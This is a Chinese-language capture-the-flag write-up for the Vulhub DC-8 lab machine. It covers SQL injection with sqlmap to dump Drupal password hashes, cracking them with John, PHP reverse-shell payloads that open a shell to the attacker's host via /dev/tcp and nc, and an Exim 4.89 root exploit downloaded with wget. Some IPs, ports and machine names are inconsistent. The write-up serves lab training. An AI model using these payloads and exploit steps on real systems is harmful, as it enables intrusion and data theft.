Vulhub 靶场训练 DC-8解析

一、环境搭建

kali的IP地址：192.168.200.14

DC-8的IP地址：192.168.200.13（一个flag）

靶机和攻击机处于同一个网络方式：nat或桥接

若出现开机错误，适当将dc的兼容版本改低，我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式：

arp-scan -l

1707096409_65c0395921b40dc60ff96.png!small?1707096410866

第二种方式：

netdiscover -r 192.168.200.0/24

1707096416_65c039601181f4d8b1c39.png!small?1707096417428

2、开放端口探测

nmap -sV -p-  192.168.200.13

1707096425_65c039690ea669f78bb6c.png!small?1707096426517

开放端口有两个：22（SSH服务默认端口）和80（http默认端口）

3.目录扫描

1707096435_65c039730c337d1afd246.png!small?1707096435976

1707096440_65c03978b5445e89cc547.png!small?1707096441695

1707096446_65c0397e8e10780b3a8ed.png!small?1707096447687

查看robots。txt文件

1707096453_65c03985d5c12d553a15e.png!small?1707096454863

这些禁止爬取的文件基本上都访问不了

三，漏洞探测

访问web页面

1707096463_65c0398f22eef008ab219.png!small?1707096464271

和DC-7一样的CMS（Drupal），DC-7的版本是8的，这个DC-8的版本是7的

不过页面中存在这样的三个不同的URL:

http://192.168.200.13/?nid=1

http://192.168.200.13/?nid=2

http://192.168.200.13/?nid=3

可能存在文件包含和SQL注入的漏洞

1707096470_65c039962f0f115be5ec5.png!small?1707096471645

SQLMAP

1、扫描数据库

sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

1707096477_65c0399d72bfdc0d23575.png!small?1707096478950

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

1707096485_65c039a5d4af8cf95cfed.png!small?1707096487029

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

1707096514_65c039c21d342f8fe79b0.png!small?1707096515383

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

1707096522_65c039ca6b2365f349616.png!small?1707096523660

账号：admin

密码： $S$ D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号：john

密码： $S$ DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的，用john进行爆破，先保存到password.txt文件中

vim  password.txt

1707096531_65c039d3bb66f35725e7e.png!small?1707096532801

1707096536_65c039d81cbd1402d3f97.png!small?1707096537157

爆破出来密文：turtle

试试能不能直接账号对 DC-8 进行ssh登录，没成功，只能想办法获取webshell了

1707096543_65c039df78274a11f26ce.png!small?1707096544679

2.反弹shell

先用获得的密码：turtle登录，试试登录后台，应该是john的密码

1707096551_65c039e79bfdde944fbc5.png!small?1707096552648

登录成功！

1707096560_65c039f011ecd7e3c15ad.png!small?1707096561194

还是运用上一靶场的方法，找一找能上传一句话木马的php文件

连不上。然后显示phpinfo的地址死活没反应

直接获取shell

PHP反弹 shell（Post 请求发送命令）

<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?>

将提交重定向行Confirmation page（确认页面）给勾上，然后滑下点保存，联系随便填入联系表单，点击发送，触发PHP代码

1707096569_65c039f9a28c02c881412.png!small?1707096570796

1707096577_65c03a01c32a87b84ba20.png!small?1707096578738

成功反弹shell

1707096584_65c03a08b316ebe7af53b.png!small?1707096585882

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

1707096593_65c03a11292240a711ffe.png!small?1707096594204

查询Exim 版本为4.89

1707096599_65c03a17d0a1b56852b03.png!small?1707096601070

利用kali搜索EXP

1707096607_65c03a1f33af4c2c75f53.png!small?1707096608721

不破坏原有结构，复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh

开启http服务

python -m http.server 8899

注：交互页面，方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

1707096618_65c03a2ab235c83dad241.png!small?1707096619975

文件权限是无执行权限的，赋予执行权限

chmod 777 shell.sh

1707096624_65c03a3099b52fea1d07b.png!small?1707096625612

赋予可执行权限

1707096631_65c03a37429f8a5dd4cb6.png!small?1707096632431

接着根据sh脚本提示，执行文件

./shell.sh

不过奇怪的是，执行完之后还是普通权限

1707096639_65c03a3f0fd4448180713.png!small?1707096640196

查看脚本的使用规则，又两个参数可用

1707096646_65c03a46a9b6db15e4945.png!small?1707096647939

将两个规则分别运行，第一个规则在运行之后无效；第二个规则成功运行，等待几秒之后，输入whoami可以看到提权成功

1707096655_65c03a4f05f984e4d9eac.png!small?1707096656246

近到root目录，查看最终flag内容

1707096662_65c03a56e5e5373c325fd.png!small?1707096664524

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/407367.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！